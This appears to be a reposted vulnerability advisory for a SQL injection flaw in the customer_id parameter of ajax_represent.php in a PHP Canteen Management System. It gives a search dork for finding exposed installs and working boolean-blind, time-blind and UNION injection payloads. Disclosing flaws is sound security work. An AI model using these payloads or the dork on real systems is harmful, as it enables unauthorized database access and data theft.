Canteen Management System ajax_represent.php sql injection
Canteen Management System ajax_represent.php sql injection
inurl: youthappam/php_action/ajax_represent.php
Abstract:
Line 27 of ajax_represent.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
- Data enters a program from an untrusted source.
- The data is used to dynamically construct a SQL query.
In this case, the data is passed to query() in ajax_represent.php at line 27.
current-db
payload:
Parameter: customer_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: customer_id=1' AND 4961=4961 AND 'mqPP'='mqPP Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer_id=1' AND (SELECT 6401 FROM (SELECT(SLEEP(5)))eypH) AND 'vuyE'='vuyE Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: customer_id=-9319' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7671,0x6c415159714766417374776d5443614642596d75705455494944776c49436974744d56574146766d,0x7171717871),NULL,NULL,NULL,NULL-- -Download Code:
https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html
来源地址:https://blog.csdn.net/hzwsuki/article/details/128277038
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
